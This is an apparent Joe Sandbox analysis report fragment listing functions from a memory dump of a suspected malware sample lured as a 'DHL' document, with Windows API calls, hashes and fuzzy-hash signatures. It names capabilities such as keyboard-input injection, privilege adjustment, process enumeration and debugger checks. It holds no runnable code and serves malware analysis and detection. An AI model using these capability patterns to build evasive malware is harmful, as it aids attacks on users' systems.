                                                                                      • Instruction Fuzzy Hash: 7D519371A002109FD714AF24D886F6A77E5EB45718F188498F9066F3D3D771EE418BB1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 44897bac43eef949e8d6b8715d85cfd51c12db610dd7aba2190a61bb34422bd9
                                                                                      • Instruction ID: b9638a393ccbe1481befef2cdf4f8bc39c3ff2495d09a144557c197d0e85438a
                                                                                      • Opcode Fuzzy Hash: 44897bac43eef949e8d6b8715d85cfd51c12db610dd7aba2190a61bb34422bd9
                                                                                      • Instruction Fuzzy Hash: FB21A6317402105FD7248F2AC85CB66BFE5EF85315F19A09CE845AB351C771DC46CB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                      • API String ID: 0-1546025612
                                                                                      • Opcode ID: 1de3e8042257681a4d8c3273739c1930b6a645eb1deb463f9cd8a96426ef6f11
                                                                                      • Instruction ID: b23c0036b6d6ba2e9c7c95f3231a01600b350bce2be8cea11056bf7d6d5cb60a
                                                                                      • Opcode Fuzzy Hash: 1de3e8042257681a4d8c3273739c1930b6a645eb1deb463f9cd8a96426ef6f11
                                                                                      • Instruction Fuzzy Hash: 1BA2BE70E0025ACBDF24DF59C8407AEB7B1BF55354F2881AAEC55A7284EB70DD81DBA0
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E082AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($tb$|
                                                                                      • API String ID: 1659193697-1968160224
                                                                                      • Opcode ID: 340d4278d47fad981da1909f21b84cc987ec898cd308bc0c3a7ca6d92f2ac26a
                                                                                      • Instruction ID: 5992c5387f556e7636c9f8e0ebcb3a737a3fb440e356aaf3cd54d0c001ada086
                                                                                      • Opcode Fuzzy Hash: 340d4278d47fad981da1909f21b84cc987ec898cd308bc0c3a7ca6d92f2ac26a
                                                                                      • Instruction Fuzzy Hash: 55323774A00605DFC728CF19C581AAAB7F0FF48714B15D56EE49AEB3A1EB70E981CB50
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E2A6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E2A6BA
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E2A79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A7AB
                                                                                        • Part of subcall function 00DBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DE3303,?), ref: 00DBCE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1991900642-0
                                                                                      • Opcode ID: 476ee7303b103b0eb919f37f13ed34b3e31bfb15588c6b65e902aeb1cddc5d57
                                                                                      • Instruction ID: 7e1d99c72004c12bca0c92b628d3da009c6ca07c1e24e5f1d7f97575abb8e5a4
                                                                                      • Opcode Fuzzy Hash: 476ee7303b103b0eb919f37f13ed34b3e31bfb15588c6b65e902aeb1cddc5d57
                                                                                      • Instruction Fuzzy Hash: 49515F715083109FD714EF24D886A6BBBF8FF89754F04892DF585A7251EB30D904CBA2
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E0AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 00E0AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E0AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E0AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: f7adced98155a1f83c0958878e5a3fe04ee1613560f65a50233371600f2c2e8b
                                                                                      • Instruction ID: ee9c2a0cfaa576eb77e0abc55f01deffe8ba2b10d78554193b428d5756391909
                                                                                      • Opcode Fuzzy Hash: f7adced98155a1f83c0958878e5a3fe04ee1613560f65a50233371600f2c2e8b
                                                                                      • Instruction Fuzzy Hash: 2C311631A4030CAEFB358B65CC09BFA7BA6AB44314F1C622AF081761D1D374C9C5CB62
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00DDBB7F
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • GetTimeZoneInformation.KERNEL32 ref: 00DDBB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00E7121C,000000FF,?,0000003F,?,?), ref: 00DDBC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00E71270,000000FF,?,0000003F,?,?,?,00E7121C,000000FF,?,0000003F,?,?), ref: 00DDBC36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                      • String ID:
                                                                                      • API String ID: 806657224-0
                                                                                      • Opcode ID: 40f8ddc3798213ea0c6abc151d394011ef2278e92e6d904a07691ed9a37c449a
                                                                                      • Instruction ID: 381f69ffc57154fcea99676d52b59a96f9177e74fac26272503991bff5d33426
                                                                                      • Opcode Fuzzy Hash: 40f8ddc3798213ea0c6abc151d394011ef2278e92e6d904a07691ed9a37c449a
                                                                                      • Instruction Fuzzy Hash: 5A31BC70904385DFCB10DF6E9C81829BBB8FF4536471A42ABE054EB3B2DB309944EB60
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00E1CE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00E1CEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00E1CEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: 724ddcfbfd1c27519bdf682faf8a9c63104f3a2ff557f97acea653e70f89b307
                                                                                      • Instruction ID: 28ea9371bd527b5671f8ad3a5001e28fdd9c239124b04db2cf57422203ae61ed
                                                                                      • Opcode Fuzzy Hash: 724ddcfbfd1c27519bdf682faf8a9c63104f3a2ff557f97acea653e70f89b307
                                                                                      • Instruction Fuzzy Hash: 3921B0B15407059FD720CFA5C948BEBBBF9EB00358F20441EE546F2151E774ED858B60
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E15CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E15D17
                                                                                      • FindClose.KERNEL32(?), ref: 00E15D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 8b6d00232d56f4d681cba8dfbb8260c11389d15605298529ceed26004f7d5ad0
                                                                                      • Instruction ID: 9e2681fa9b37fe0d10c9f0f7b673651d442bf0d5bd7a5dcd093c2ac077ab90eb
                                                                                      • Opcode Fuzzy Hash: 8b6d00232d56f4d681cba8dfbb8260c11389d15605298529ceed26004f7d5ad0
                                                                                      • Instruction Fuzzy Hash: 91519B75604A01DFC714CF28D484E96BBE4FF8A324F14855DE95A9B3A1CB30ED84CBA1
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00DD271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DD2724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00DD2731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 4bd3199d706cf0bcc94041bba1004fee7e6512ff645369dc7237ceaa79ddc0e7
                                                                                      • Instruction ID: 525031bce3d13dbe4b0f608c65fd3428e9e39c52d229b5994eea81104c5ab50b
                                                                                      • Opcode Fuzzy Hash: 4bd3199d706cf0bcc94041bba1004fee7e6512ff645369dc7237ceaa79ddc0e7
                                                                                      • Instruction Fuzzy Hash: 1731D57590121DABCB21DF64DC88B9DBBB8EF18310F5041EAE81CA7260E7349F858F54
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E151DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E15238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00E152A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: aa06f5b6b59f2ec71f1b4e7d3af3bc934cbd1ec3caf2339061b428de8632e9eb
                                                                                      • Instruction ID: 90ab1dded918b42ed94f8203df44f84d2dc9b47b9c818a66f41ca88334662e81
                                                                                      • Opcode Fuzzy Hash: aa06f5b6b59f2ec71f1b4e7d3af3bc934cbd1ec3caf2339061b428de8632e9eb
                                                                                      • Instruction Fuzzy Hash: 53312F75A00518DFDB00DF55D884EADBBB4FF49318F148499E805AB3A2DB31E855CB60
                                                                                      APIs
                                                                                        • Part of subcall function 00DBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC0668
                                                                                        • Part of subcall function 00DBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC0685
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E0173A
                                                                                      • GetLastError.KERNEL32 ref: 00E0174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 577356006-0
                                                                                      • Opcode ID: 61edcf0b18fd7ab5ab2b8c6b8db453439983577fdcec20963852d28c5ffaf75d
                                                                                      • Instruction ID: 40930c94c3708606c2276c2b53082c4e10ee67e5370fbb2712f29fbffcfe69cc
                                                                                      • Opcode Fuzzy Hash: 61edcf0b18fd7ab5ab2b8c6b8db453439983577fdcec20963852d28c5ffaf75d
                                                                                      • Instruction Fuzzy Hash: 3E1191B2504308AFD7189F54DC86DAABBB9EB44714B24856EE05667281EB70FC858B30
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E0D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00E0D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E0D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: 004d5542ce0b96e3dde26fdbe29f545130c2453d6797c10c9bdf4b258ca29076
                                                                                      • Instruction ID: 7c6921e5c5a90b538dd04dc469a9efca655945942c53a967ba2ff13165e8a9d3
                                                                                      • Opcode Fuzzy Hash: 004d5542ce0b96e3dde26fdbe29f545130c2453d6797c10c9bdf4b258ca29076
                                                                                      • Instruction Fuzzy Hash: AE113CB5E05228BFDB108F95AC49FAFBFBCEB45B50F108155F904F7290D6704A058BA1
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E0168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E016A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 00E016B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: 972ec387441f720f9818839504ce57ce3e32371b5d2ceb6416eed01f1cc476cd
                                                                                      • Instruction ID: 7eb83bd3e1512ceb1aa84b6e0472e9b958ea6f15690ae215d5c44299663cb64d
                                                                                      • Opcode Fuzzy Hash: 972ec387441f720f9818839504ce57ce3e32371b5d2ceb6416eed01f1cc476cd
                                                                                      • Instruction Fuzzy Hash: 00F0F47195030DFFDB00DFE59D89AAEBBBCEB08704F5045A5E501F2181E774EA489B50
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00DD28E9,?,00DC4CBE,00DD28E9,00E688B8,0000000C,00DC4E15,00DD28E9,00000002,00000000,?,00DD28E9), ref: 00DC4D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00DC4CBE,00DD28E9,00E688B8,0000000C,00DC4E15,00DD28E9,00000002,00000000,?,00DD28E9), ref: 00DC4D10
                                                                                      • ExitProcess.KERNEL32 ref: 00DC4D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: c929ae477fee482fedbd8d6ba88aae6ba07716d88731e82afc2adf28a784d0ba
                                                                                      • Instruction ID: f35ced797c49fb37468527411f3ba4d873d0d026c8ff60c08c2a883a63fcc890
                                                                                      • Opcode Fuzzy Hash: c929ae477fee482fedbd8d6ba88aae6ba07716d88731e82afc2adf28a784d0ba
                                                                                      • Instruction Fuzzy Hash: A6E0B631000149AFCF11BF65DD1EF983F69EB41791B244458FC06AB222CB35DD56DBA0
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00DFD28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: a505e34c9b0af0677d0a61bd6c34880a7634c8a4e3b9f73d30aab990a9d577a9
                                                                                      • Instruction ID: fc60fcc4df5954866ba61f169034f463bcf76f381e13f6bd42a57426b7cf9c8c
                                                                                      • Opcode Fuzzy Hash: a505e34c9b0af0677d0a61bd6c34880a7634c8a4e3b9f73d30aab990a9d577a9
                                                                                      • Instruction Fuzzy Hash: 7CD0C9B480111DEECB94DB90DC88DD9B77DBB04305F104151F146B2000D730D5488F20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: 5dc4bcfe422ef24fa7609d292c733694efee9fd176c218297720165655a5b44b
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: 26021C71E1121A9BDF14CFA9C980BADBBF5EF48314F29416DE919E7380D731AD418B90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
